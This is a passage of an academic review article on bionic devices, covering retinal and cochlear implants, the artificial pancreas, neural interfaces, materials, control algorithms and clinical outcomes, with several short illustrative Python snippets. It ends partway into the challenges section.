<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Device / Material</td><td>Key Feature</td><td>Advantage</td></tr><tr><td></td><td></td><td></td></tr><tr><td>Argus II (Second Sight)</td><td>Retinal electrode array</td><td>Restores basic light perception</td></tr><tr><td>Long et al. (2023)</td><td>Perovskite nanowire retina</td><td>Filter-free color vision; wide FoV</td></tr><tr><td>Zhang et al. (2023)</td><td>TIPS-pentacene organic retina</td><td>Broadband; synaptic plasticity</td></tr><tr><td>Artificial Synapse Retinas</td><td>Memristor-based photonic synapses</td><td>In-device preprocessing; memory</td></tr><tr><td></td><td></td><td></td></tr></tbody></table></figure>



<h4 class="wp-block-heading">B. Bionic Eyes</h4>



<p>The restoration of vision is among the most ambitious goals of sensory prosthetics. Early retinal implants such as Argus II used electrode arrays to stimulate the surviving retinal ganglion cells, enabling basic light perception and object localization [5]. However, spatial resolution remained low, and the devices were limited to high-contrast vision.</p>



<p>Recent approaches leverage neuromorphic engineering and novel materials. Long et al. reported a hemispherical perovskite nanowire retina capable of filter-free color recognition [10]. By integrating adaptive optics with neuromorphic preprocessing circuits, the system achieved wide-field, low-noise, and low-power color vision. Similarly, Zhang et al. developed a TIPS-pentacene phototransistor retina, exhibiting broadband sensitivity (380–740 nm), high optical transparency, and synaptic plasticity for visual memory [11]. The choice of TIPS-pentacene, with its narrow bandgap (∼1.6 eV), enabled efficient photon absorption across the visible spectrum, mimicking natural photoreceptors.</p>



<p>These neuromorphic systems go beyond electrode-based stimulation by embedding preprocessing within the retina itself, thereby reducing latency and power consumption. While still in preclinical stages, they represent a paradigm shift toward bioinspired vision systems capable of continuous learning and adaptation.</p>



<h4 class="wp-block-heading">C. Bionic Ears</h4>



<p>The cochlear implant remains the most successful sensory prosthesis to date, with more than 700,000 users worldwide [22]. It works by bypassing damaged hair cells of the cochlea and directly stimulating the auditory nerve with electrode arrays. Modern cochlear implants use advanced signal processing algorithms to decompose sound into frequency channels and deliver spatially coded electrical impulses.</p>
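<p>The channel-decomposition step can be sketched in a few lines. The toy example below, loosely patterned on continuous interleaved sampling (CIS), band-pass filters a test signal into eight channels and extracts the smoothed envelope that would modulate pulse amplitude on each electrode. The channel count, filter orders, and cutoff frequencies are assumptions for illustration, not the parameters of any clinical processor.</p>

<pre class="wp-block-code"><code>import numpy as np
from scipy.signal import butter, sosfilt

fs = 16_000                                   # sample rate (Hz), assumed
t = np.arange(0, 0.05, 1 / fs)
sound = np.sin(2 * np.pi * 440 * t) + 0.5 * np.sin(2 * np.pi * 2200 * t)

edges = np.logspace(np.log10(300), np.log10(7000), 9)   # 8 channels

for i, (lo, hi) in enumerate(zip(edges[:-1], edges[1:])):
    band_sos = butter(4, [lo, hi], btype="bandpass", fs=fs, output="sos")
    band = sosfilt(band_sos, sound)           # isolate one frequency channel
    env_sos = butter(2, 200, btype="low", fs=fs, output="sos")
    envelope = sosfilt(env_sos, np.abs(band)) # rectify, then smooth
    # Each envelope would modulate pulses on one cochlear electrode.
    print(f"channel {i}: {lo:6.0f}-{hi:6.0f} Hz, mean envelope {envelope.mean():.4f}")
</code></pre>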



<p>Key technological progress includes fine structure processing, which encodes temporal cues for improved music perception, and optogenetic cochlear implants, which use light to stimulate genetically modified neurons with higher precision [24]. While conventional devices are limited to about 22 electrode channels, optogenetic approaches promise higher resolution with reduced channel interaction.</p>



<h4 class="wp-block-heading">D. Bionic Organs</h4>



<ol class="wp-block-list">
<li>Artificial Pancreas: The artificial pancreas integrates a Continuous Glucose Monitor (CGM) with an insulin pump under closed-loop algorithmic control. Early systems used Proportional–Integral–Derivative (PID) control, but modern devices employ Model Predictive Control (MPC), which anticipates glucose fluctuations based on meals, exercise, and circadian rhythms [23]. Clinical trials show that MPC-based artificial pancreas systems reduce hypoglycemia incidence and improve HbA1c compared to conventional insulin therapy (a toy PID sketch follows this list).</li>



<li>Other Organ-Level Devices: Beyond diabetes, prototypes of bionic kidneys (artificial filtration units) and bioartificial hearts are under investigation. For example, wearable dialysis systems combine nanoporous membranes with microfluidic pumps, while ventricular assist devices integrate soft robotics for pulsatile flow. While less mature than limb or sensory prostheses, these devices extend the concept of bionics to systemic organ replacement.</li>
</ol>
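<p>For reference, the toy PID loop below regulates a one-compartment glucose model toward a setpoint, illustrating the closed-loop principle that MPC systems refine with prediction. The gains, setpoint, and plant dynamics are illustrative assumptions and bear no relation to any approved dosing algorithm.</p>

<pre class="wp-block-code"><code># Toy PID glucose controller (all constants are illustrative assumptions).
setpoint = 110.0                  # target glucose (mg/dL)
kp, ki, kd = 0.02, 0.001, 0.05    # PID gains
glucose, integral, prev_error = 180.0, 0.0, 0.0
dt = 5.0                          # minutes between CGM readings

for step in range(24):
    error = glucose - setpoint
    integral += error * dt
    derivative = (error - prev_error) / dt
    insulin = max(0.0, kp * error + ki * integral + kd * derivative)  # U/h
    prev_error = error
    # Toy plant: insulin lowers glucose; meals/liver add a small upward drift.
    glucose += (-2.0 * insulin + 0.3) * dt
    print(f"t={step * dt:4.0f} min  glucose={glucose:6.1f} mg/dL  insulin={insulin:.2f} U/h")
</code></pre>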



<h4 class="wp-block-heading">E. Neural Interfaces and Brain–Computer Interfaces</h4>



<ol start="5" class="wp-block-list"></ol>



<p>Neural interfaces serve both as standalone assistive technologies and as enabling components of bionic limbs and sensory devices. They can be broadly classified as non-invasive (EEG, fNIRS), minimally invasive (ECoG), and invasive (Utah arrays, intraneural electrodes).</p>



<p>Non-invasive BCIs offer safety and accessibility but suffer from low spatial and temporal resolution. Invasive approaches achieve higher bandwidth but face challenges of biocompatibility and stability. Recent advances include:</p>



<ul class="wp-block-list">
<li>Hybrid nerve interfaces (Cho et al., 2023) that combine RPNIs with shape-memory polymer buckles, achieving stable bidirectional signaling in animal models [7].</li>



<li>Reinforcement learning-based BCIs that achieve two to three times the prosthetic hand control accuracy of supervised learning [12].</li>



<li>Bidirectional BCIs that not only decode motor intent but also deliver sensory feedback through cortical stimulation [13], [14].</li>
</ul>



<p>These technologies are converging toward closed-loop systems, where intention and perception are integrated within the same neural–machine cycle.</p>



<h2 class="wp-block-heading">IV. Technological Advancements and State-of-the-Art </h2>



<p>The performance of bionic devices is fundamentally constrained by the quality of their materials, sensors, actuators, and neural interfacing technologies. In recent years, breakthroughs in biocompatible materials, microelectronics, and artificial intelligence have dramatically improved the fidelity of motor control, the richness of sensory feedback, and the long-term stability of implantable systems. This section reviews these advances, emphasizing both the underlying mechanisms and the way they address prior limitations.</p>



<h4 class="wp-block-heading">A. Materials for Bionics</h4>



<p>1. Biocompatible Polymers and Flexible Electronics: Traditional rigid electronics are poorly matched to the soft, dynamic environment of biological tissue, often leading to inflammatory responses and signal degradation. Flexible polymers such as polyimide, PDMS (polydimethylsiloxane), and parylene-C have become standard substrates for implantable electrodes. These materials reduce mechanical mismatch, minimizing scar tissue encapsulation and improving long-term signal stability [9].</p>



<ol class="wp-block-list"></ol>



<p>Emerging organic semiconductors have further enabled neuromorphic HCIs. For instance, 6,13-bis(triisopropylsilylethynyl)pentacene (TIPS-pentacene) was selected in Zhang et al. for its narrow bandgap (∼1.6 eV), which allows photon absorption across the visible spectrum [11]. Its high carrier mobility and optical transparency made it ideal for constructing a retina-like phototransistor array that mimics the broadband response of photoreceptors. TIPS-pentacene also exhibits synaptic plasticity under repeated light stimulation, enabling short-term visual memory tasks and demonstrating how material choice directly determines device intelligence. In short, TIPS-pentacene functions as a photoactive organic semiconductor that provides both light detection and learning-like behavior within neuromorphic retinal systems.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="199" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-1024x199.jpeg" alt="" class="wp-image-4560" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-1024x199.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-300x58.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-768x149.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-1000x194.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-230x45.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-350x68.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4-480x93.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-4.jpeg 1234w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 6: Innovation timeline (2020–2025) highlighting selected advances from the reference set. Key milestones include the open-source bionic leg (2020) [6], prosthetic touch and kinesthesia integration (2021) [3], a clinically deployed neural-controlled bionic hand (2023) [1], and reinforcement learning control for dexterous hand function (2024) [12].</p>



<p>2. Metals and Ceramics for Osseointegration: In HCI limbs, titanium alloys are the gold standard for osseointegration due to their high strength, corrosion resistance, and biocompatibility. Surface treatments (e.g., hydroxyapatite coatings) promote bone ingrowth, enabling long-term skeletal anchoring [15]. The percutaneous feedthroughs enabled by titanium implants also provide a stable, infection-resistant pathway for electrodes, addressing the long-standing problem of percutaneous connectors in neural prostheses.</p>



<ol start="2" class="wp-block-list"></ol>



<h4 class="wp-block-heading">B. Sensors and Actuators</h4>



<p>Bionic devices rely on sensors to detect environmental stimuli and actuators to reproduce biological motion.</p>



<ol class="wp-block-list">
<li>MEMS and Soft Sensors: Miniaturized Microelectromechanical Systems (MEMS) enable high-resolution detection of forces, pressures, and accelerations. In prosthetic hands, MEMS pressure sensors embedded in fingertips translate tactile stimuli into electrical signals that can be delivered back to the nervous system [3]. For lower-limb devices, Inertial Measurement Units (IMUs) allow real-time detection of gait phases, enabling adaptive damping in microprocessor knees (a toy gait-phase detector is sketched after this list).</li>
</ol>
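<p>A minimal sketch of IMU-based gait-phase detection follows, assuming a synthetic shank angular-velocity signal and hand-picked thresholds; commercial microprocessor knees rely on considerably more elaborate state machines.</p>

<pre class="wp-block-code"><code>import numpy as np

# Toy gait-phase detector on a synthetic gyroscope trace (assumed signal).
fs = 100                                    # IMU sample rate (Hz)
t = np.arange(0, 4, 1 / fs)
gyro = np.sin(2 * np.pi * 1.0 * t)          # ~1 Hz stride, rad/s (synthetic)

def label(w):
    if w &gt; 0.3:
        return "swing"                      # rapid forward rotation
    if w &lt; -0.3:
        return "stance"                     # braking / loading
    return "transition"

phases = [label(w) for w in gyro]
# A microprocessor knee would switch damping profiles at these transitions.
changes = [(round(t[i], 2), p) for i, p in enumerate(phases)
           if i and p != phases[i - 1]]
print(changes[:6])
</code></pre>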



<p>Soft sensors based on conductive hydrogels or liquid metals are increasingly integrated into prosthetic liners, providing conformal detection of skin strain and residual limb pressure. These sensors improve socket fit monitoring and help prevent skin breakdown.</p>



<ol start="2" class="wp-block-list">
<li>Actuation Systems: Historically, prosthetic actuation relied on DC motors, which are bulky and energy-inefficient. Recent approaches explore series elastic actuators, which integrate elastic elements to store and release energy, improving safety and compliance during human–robot interaction. Shape Memory Alloys (SMAs) and Dielectric Elastomer Actuators (DEAs) offer biomimetic muscle-like contraction, although their power efficiency and thermal properties remain challenges.</li>
</ol>



<p>In the context of the artificial pancreas, actuators are miniaturized insulin pumps capable of delivering precisely timed, finely metered subcutaneous doses. The accuracy of these pumps, combined with continuous glucose monitoring, underpins the safety of closed-loop systems [23].</p>



<h4 class="wp-block-heading">C. Neural Interfaces</h4>



<p>The neural interface is the critical bottleneck for high-performance bionic systems, as it governs the bandwidth of communication between the user and the device.</p>



<ol class="wp-block-list">
<li>Non-Invasive vs. Invasive Interfaces: Non-invasive techniques such as surface EMG and EEG (Electromyography and Electroencephalography) are safe but limited by poor signal-to-noise ratio. In contrast, invasive methods such as intraneural electrodes, epimysial implants, and cortical arrays offer high bandwidth but risk tissue damage and long-term instability.</li>
</ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="439" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-1024x439.jpeg" alt="" class="wp-image-4561" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-1024x439.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-300x129.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-768x330.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-1000x429.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-230x99.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-350x150.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5-480x206.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-5.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 7: Material-to-function mapping: examples include TIPS-pentacene → neuromorphic vision; titanium → osseointegration; MEMS → tactile/proprioception; series elastic actuators → compliant actuation; shape-memory polymers (SMP) → hybrid nerve interfaces.</p>



<p>The hybrid nerve interface proposed by Cho et al. exemplifies a middle ground [7]. By combining regenerative peripheral nerve interfaces (muscle grafts reinnervated by nerve endings) with a shape memory polymer buckle, the system stabilized nerve–electrode contact over 29 weeks in rabbits. This design achieved stable bidirectional communication—demonstrating both sensory recording and robotic leg control—suggesting that hybrid constructs may resolve the trade-off between invasiveness and stability.</p>



<ol start="2" class="wp-block-list">
<li>Osseointegration as a Neural Gateway: Ortiz-Catalan et al. demonstrated that osseointegrated implants could act not only as skeletal anchors but also as percutaneous conduits for neural signals [1]. By routing electrode wires through titanium fixtures integrated into the radius and ulna, they achieved stable myoelectric recording and direct neural stimulation for more than three years in daily use. This dual role of osseointegration—as both a mechanical interface and a neural gateway—represents a major advance in long-term clinical viability.</li>



</ol>



<h4 class="wp-block-heading">D. Computational Algorithms and Decoding</h4>



<ol start="4" class="wp-block-list"></ol>



<p>Advances in machine learning have transformed bionic control from binary, sequential commands to rich, continuous decoding of intent.</p>



<ol class="wp-block-list">
<li>Pattern Recognition and Regression: Early myoelectric prostheses employed simple thresholding: one muscle contraction to open the hand, another to close. Modern devices employ pattern recognition algorithms (support vector machines, linear discriminants) trained on multichannel EMG to decode a variety of gestures. Regression-based approaches enable proportional control, translating EMG amplitude directly into joint torque or velocity (a minimal classification sketch follows this list).</li>
</ol>
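<p>The sketch below illustrates this pattern-recognition step on synthetic data: mean-absolute-value-style features from eight EMG channels are classified into three gestures with a linear discriminant, mirroring the classical pipeline described above. The data generator and class structure are assumptions made purely for illustration.</p>

<pre class="wp-block-code"><code>import numpy as np
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

rng = np.random.default_rng(1)
n_channels, n_windows = 8, 300

def windows_for(gain_profile):
    """Crude MAV-like features for EMG windows of one gesture (synthetic)."""
    raw = rng.normal(0.0, 1.0, (n_windows, n_channels)) * gain_profile
    return np.abs(raw)

gains = {"rest":  np.full(n_channels, 0.1),
         "open":  np.linspace(0.2, 1.0, n_channels),
         "close": np.linspace(1.0, 0.2, n_channels)}

X = np.vstack([windows_for(g) for g in gains.values()])
y = np.repeat(list(gains.keys()), n_windows)

clf = LinearDiscriminantAnalysis().fit(X, y)
print("training accuracy:", clf.score(X, y))
</code></pre>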



<ol start="2" class="wp-block-list">
<li>Reinforcement Learning (RL): A major innovation is the use of reinforcement learning for prosthetic control. Schone et al. implemented an RL framework with a “Guitar Hero”-like training game, where users received real-time feedback as they attempted specific hand gestures [12]. Over time, the system adapted both to user variability and electrode drift. The RL-based controller achieved two to three times the accuracy of supervised learning, particularly for simultaneous multi-finger movements, demonstrating how adaptive algorithms can overcome the limitations of static calibration (see the toy sketch after this list).</li>
</ol>
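<p>The toy below conveys the spirit of reward-driven adaptation rather than the cited system itself: a scalar decoder gain is randomly perturbed and better-scoring candidates are kept, so the mapping tracks simulated electrode drift without any explicit recalibration session.</p>

<pre class="wp-block-code"><code>import numpy as np

rng = np.random.default_rng(2)
true_gain = 2.0                    # the user's actual EMG-to-velocity mapping
gain = 0.5                         # decoder's current (mis-calibrated) estimate

for step in range(300):
    true_gain += 0.002             # simulated slow electrode drift
    emg = rng.uniform(0.5, 1.5)
    reward = -(true_gain * emg - gain * emg) ** 2       # task-success signal
    trial = gain + rng.normal(0.0, 0.1)                 # perturbed candidate
    trial_reward = -(true_gain * emg - trial * emg) ** 2
    if trial_reward &gt; reward:                           # keep the better map
        gain = trial

print(f"decoder gain {gain:.2f} vs true gain {true_gain:.2f}")
</code></pre>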



<p>TABLE IV: Technological Innovations Underpinning Modern Bionic Devices</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Domain</td><td>Innovation</td><td>Key Mechanism /Material</td><td>Problem Solved</td><td colspan="2">Representative Study</td></tr><tr><td>Materials</td><td>TIPS-pentacenephototransistors</td><td>Narrow bandgap organic semiconductor</td><td>Broadband visibleabsorption; synaptic plasticity</td><td>Zhang</td><td>Zhang et al.(2023) [11]</td></tr><tr><td>Materials</td><td>Titanium osseointegration</td><td>Biocompatible alloy with bone integration</td><td>Stable skeletalanchoring; neuralfeedthrough</td><td colspan="2">Ortiz-Catalan et al.(2023) [1]</td></tr><tr><td>Sensors</td><td>MEMS tactile arrays</td><td>Miniaturized pressure sensors</td><td>High-resolutiontouch feedback</td><td colspan="2">Marasco et al.(2021) [3]</td></tr><tr><td>Actuators</td><td>Series elastic actuators</td><td>Elastic compliance elements</td><td>Safe interaction;energy efficiency</td><td>Clites</td><td>Clites et al.(2020) [6]</td></tr><tr><td>Neural Interfaces</td><td>Hybrid nerve interface + SMP buckle</td><td>Muscle graft +shape memorypolymer</td><td>Stable long-termnerve–electrodecontact</td><td>Cho</td><td>Cho et al.(2023) [7]</td></tr><tr><td>Algorithms</td><td>Reinforcement learning control</td><td>Adaptive policy optimization</td><td>Improved multi-DoF accuracy</td><td colspan="2">Schone et al.(2024) [12]</td></tr><tr><td>Algorithms</td><td>Memristor neuromorphic retina</td><td>Non-volatile resistive elements</td><td>Low-powerin-sensorpreprocessing</td><td>Long</td><td>Long et al.(2023) [10]</td></tr></tbody></table></figure>



<ol start="3" class="wp-block-list">
<li>Neuromorphic and Memristor-Based Processing: Neuromorphic circuits emulate biological synapses and neurons in hardware. Memristors—resistive devices whose state depends on prior activity—are well-suited for synaptic plasticity. In bionic vision, memristor arrays handle in-sensor preprocessing, filtering noise and adapting to light without external processors, reducing latency and power use. Their non-volatility and scalability enable compact, low-power integration on flexible substrates. A neuromorphic retina can thus perform edge detection or motion tracking directly, similar to how biological retinas preprocess visual input (a software analogue is sketched after this list).</li>
</ol>
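<p>As a software stand-in for such hardware, the sketch below applies a Laplacian kernel to a synthetic frame: the same edge-detection operation a memristor crossbar could carry out in-sensor, before any external processor sees the data.</p>

<pre class="wp-block-code"><code>import numpy as np
from scipy.signal import convolve2d

image = np.zeros((8, 8))
image[2:6, 2:6] = 1.0                  # bright square on a dark background

laplacian = np.array([[0,  1, 0],
                      [1, -4, 1],
                      [0,  1, 0]])     # discrete Laplacian kernel

edges = convolve2d(image, laplacian, mode="same")
print(np.abs(edges) &gt; 0.5)             # True along the square's border only
</code></pre>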



<h4 class="wp-block-heading">E. Integration of Artificial Intelligence</h4>



<p>Artificial intelligence (AI) extends beyond decoding to the holistic control of closed-loop systems. In the artificial pancreas, AI-based controllers predict insulin needs using historical glucose patterns, exercise levels, and meal timing [23]. In bionic limbs, deep learning models can classify EMG signals in real time, while reinforcement learning adapts to new conditions without retraining, continuously improving performance over extended use.</p>



<p>The integration of AI also facilitates user-specific personalization. Each patient’s physiology, residual limb anatomy, and lifestyle are unique; AI enables prostheses to learn individual preferences, adjust grip force for common tasks, anticipate fatigue, or predict gait transitions under different terrains. Such adaptive capabilities reduce cognitive burden on the user and improve naturalistic embodiment of the device.</p>



<p>As computing hardware becomes more compact and energy-efficient, these algorithms are increasingly embedded on-device, reducing latency and dependence on external computers. This mirrors the neural efficiency of biological systems, which integrate sensing, computation, and actuation locally. Looking ahead, the convergence of AI with neuromorphic hardware and flexible bioelectronics promises to create prostheses that operate autonomously, respond seamlessly to environmental changes, and evolve alongside the user’s daily needs.</p>



<h2 class="wp-block-heading">V. Clinical Applications and Outcomes </h2>



<p>The ultimate measure of success for any bionic technology lies not in laboratory demonstrations but in clinical effectiveness and real-world adoption. In this section, we examine the outcomes of bionic limbs, sensory prostheses, and organ-level devices in patients, emphasizing rehabilitation results, usability, quality-of-life improvements, and challenges revealed in long-term use.</p>



<h4 class="wp-block-heading">A. Bionic Limbs in Clinical Use</h4>



<ol class="wp-block-list">
<li>Upper-Limb Prostheses: Clinical trials of advanced upper-limb prostheses have demonstrated functional restoration, reduction in phantom limb pain, and increased quality of life. Ortiz-Catalan et al. reported a transradial neuromusculoskeletal prosthesis used continuously for more than three years [1]. Functional scores improved significantly: Southampton Hand Assessment Procedure (SHAP) scores increased by 23%, while pain interference with daily life decreased by more than 50%. Importantly, the user reported being able to wear the device comfortably throughout the day, an outcome rarely achieved with socket-based systems.<br><br>Marasco et al. studied two patients with targeted reinnervation and closed-loop feedback [3]. Integration of touch, kinesthesia, and motor control allowed participants to perform tasks with visuomotor behaviors indistinguishable from able-bodied individuals. They no longer had to fixate visually on the prosthetic hand, freeing attention for higher-level planning. This demonstrates not only functional restoration but also a shift toward naturalistic embodiment.</li>



<li>Lower-Limb Prostheses: Lower-limb prostheses are judged by metrics such as walking speed, energy expenditure, and stability on varied terrain. Microprocessor knees consistently improve gait symmetry and reduce falls compared to mechanical knees [6]. Powered prostheses such as the OSL enable active ankle push-off, reducing the metabolic cost of walking. Early clinical trials show that transfemoral amputees can achieve walking speeds approaching those of able-bodied controls.<br><br>Osseointegrated lower-limb prostheses also demonstrate marked improvements in mobility. A long-term Swedish cohort study showed that more than 90% of patients reported improved prosthetic comfort, stability, and walking endurance compared to sockets [15]. However, risks such as infection and implant loosening persist.</li>
</ol>



<h4 class="wp-block-heading">B. Bionic Eyes</h4>



<ol start="2" class="wp-block-list"></ol>



<p>Retinal prostheses such as Argus II have provided basic functional vision to hundreds of blind individuals worldwide [5]. Clinical outcomes show patients can detect light sources, navigate high-contrast environments, and recognize large objects. However, resolution is limited (about 60 electrodes), and many users report “pixelated” vision.</p>



<p>More recent neuromorphic retinal devices remain at the preclinical stage but show transformative potential. Long et al. demonstrated that a perovskite nanowire retina achieved filter-free color discrimination and wide-field imaging in laboratory models [10]. Similarly, Zhang et al. reported that their organic phototransistor retina exhibited plasticity and visual memory, features that could translate to more naturalistic visual experiences [11]. While these results have not yet reached human trials, they suggest a trajectory toward functionally rich vision restoration.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="926" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-1024x926.jpeg" alt="" class="wp-image-4562" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-1024x926.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-300x271.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-768x694.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-1000x904.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-230x208.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-350x316.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6-480x434.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-6.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 8: Clinical outcome radar across device categories (illustrative 0–10 scales). Limb outcomes reflect neuromusculoskeletal prosthesis and closed-loop feedback studies [1], [3]; speech perception for ears from cochlear implant literature [22], [24]; HbA1c control from artificial pancreas trials [23]; independence and dexterity improvements from BCI work [13], [14].</p>



<h4 class="wp-block-heading">C. Cochlear Implants and Auditory Prostheses</h4>



<p>Cochlear implants are the most clinically established bionic devices, with decades of long-term outcome data. Studies consistently show that recipients achieve near-normal speech perception in quiet environments, with 80–90% of adult users able to understand conversational speech [22], [24]. Pediatric recipients implanted before the age of two can develop speech and language skills comparable to hearing peers, underscoring the importance of early intervention.</p>



<p>Limitations remain in music perception and speech-in-noise environments. Fine structure processing algorithms have partially addressed these gaps, while emerging optogenetic cochlear implants offer the possibility of finer frequency resolution by stimulating auditory neurons with light rather than electricity [24]. Though still in early trials, such devices could overcome the channel-interaction limits of electrode arrays.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="647" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-1024x647.jpeg" alt="" class="wp-image-4563" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-1024x647.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-300x190.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-768x485.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-1000x632.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-230x145.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-350x221.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7-480x303.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-7.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 9: Patient-centered benefits vs. limitation severity (illustrative 0–10). Scores are synthesized from clinical and review reports across limbs [1], [3], [15], eyes [5], [10], [11], ears [22], [24], organs [23], and BCIs [13], [14].</p>



<h4 class="wp-block-heading">D. Artificial Pancreas</h4>



<p>The artificial pancreas has advanced from inpatient feasibility studies to widespread outpatient use. Closed-loop systems integrating continuous glucose monitors and insulin pumps have demonstrated significant clinical benefits.</p>



<p>In the Cambridge Artificial Pancreas trials, adults and adolescents with type 1 diabetes using closed-loop control spent over 70% of the day in target glucose range, compared to about 50% with conventional therapy [23]. HbA1c levels improved by approximately 0.5%, and hypoglycemia episodes were reduced by more than 40%. These results have led to regulatory approval of hybrid closed-loop systems (Medtronic 670G, Tandem Control-IQ).</p>



<p>Beyond diabetes, closed-loop bioelectronic devices for hypertension and epilepsy are under investigation, suggesting that the artificial pancreas is a prototype for a broader class of organ-level bionics.</p>



<h4 class="wp-block-heading">E. Brain–Computer Interfaces in Clinical Translation</h4>



<p>BCIs are increasingly being tested in patients with paralysis. Hochberg et al. demonstrated that tetraplegic individuals could use cortical implants to control robotic arms with multiple degrees of freedom, achieving self-feeding tasks [14]. More recently, bidirectional BCIs delivering somatosensory feedback via cortical stimulation have restored not only motor intent but also tactile perception in paralyzed patients [13].</p>



<p>Non-invasive BCIs, while less precise, have enabled basic communication in locked-in syndrome. EEG-based spellers, though slow, offer a lifeline for individuals otherwise unable to interact with their environment. Clinical usability, however, remains limited by low bandwidth and the need for expert calibration.</p>



<p>TABLE V: Summary of Clinical Outcomes in Major Bionic Devices</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Device / System</td><td>Clinical Outcomes</td><td>Patient-Reported Impact</td><td>Limitations</td></tr><tr><td>Neuromusculoskeletalarm [1]</td><td>Improved SHAP score(+23%); reducedphantom pain</td><td>Daily wear; reduceddisability</td><td>Surgical risk;infection</td></tr><tr><td>Touch + kinesthesiaprosthesis [3]</td><td>Natural visuomotorbehavior; improveddexterity</td><td>Prosthesis ownership;intuitive use</td><td>Requires surgicalreinnervation</td></tr><tr><td>Microprocessorknees [6]</td><td>Improved gaitsymmetry; fewer falls</td><td>Higher confidence;mobility</td><td>Cost; battery life</td></tr><tr><td>Osseointegratedprosthesis [15]</td><td>Increased walkingendurance; comfort</td><td>Longer wear times;better stability</td><td>Infection risk</td></tr><tr><td>Argus II retinalimplant [5]</td><td>Light detection; objectlocalization</td><td>Independence innavigation</td><td>Low resolution</td></tr><tr><td>Perovskite/organicretinas [10], [11]</td><td>Preclinical visionrestoration; color vision</td><td>Potential fornaturalistic vision</td><td>Not yet in clinicaltrials</td></tr><tr><td>Cochlearimplant [22], [24]</td><td>Near-normal speech inquiet</td><td>Major quality of lifeimprovement</td><td>Music and noiselimitations</td></tr><tr><td>Artificialpancreas [23]</td><td>HbA1c reduction; &gt;70%time in range</td><td>Reduced cognitiveburden</td><td>Device cost;calibration</td></tr><tr><td>Cortical BCI [13],[14]</td><td>Multi-DoF roboticcontrol; sensoryrestoration</td><td>Restoredindependence intasks</td><td>Invasive surgery;stability issues</td></tr></tbody></table></figure>



<h4 class="wp-block-heading">F. Patient Perspectives and Usability Studies</h4>



<p>Across device types, patient-reported outcomes highlight both the benefits and limitations of bionic devices:</p>



<ul class="wp-block-list">
<li>Users of osseointegrated prostheses report higher comfort and daily wear time but express concerns about infection risk [15].</li>



<li>Cochlear implant recipients overwhelmingly report improved quality of life, but many remain dissatisfied with music enjoyment [24].</li>



<li>Bionic limb users often emphasize the importance of intuitive control and sensory feedback, without which devices are often abandoned [3].</li>



<li>Artificial pancreas users report reduced cognitive burden, as the system automates much of the constant decision-making in diabetes care [23].</li>
</ul>



<h2 class="wp-block-heading">VI. Challenges and Limitations </h2>



<p>While recent years have witnessed transformative advances in bionic technology, clinical translation remains constrained by significant technical, biological, and regulatory challenges. These limitations underscore the gap between laboratory performance and long-term, real-world usability.</p>



<h4 class="wp-block-heading">A. Technical Challenges</h4>



<ol class="wp-block-list">
<li>Signal Reliability and Noise: Surface EMG, EEG, and even implanted electrodes are subject to signal drift, noise, and instability over time. Sweat, skin impedance, and electrode displacement degrade surface signals, while implanted electrodes may shift microscopically due to tissue remodeling. These issues lead to loss of calibration, forcing frequent retraining of pattern-recognition algorithms [3]. Reinforcement learning approaches partially address this, but stable long-term decoding remains elusive.</li>
</ol>



<ol start="2" class="wp-block-list">
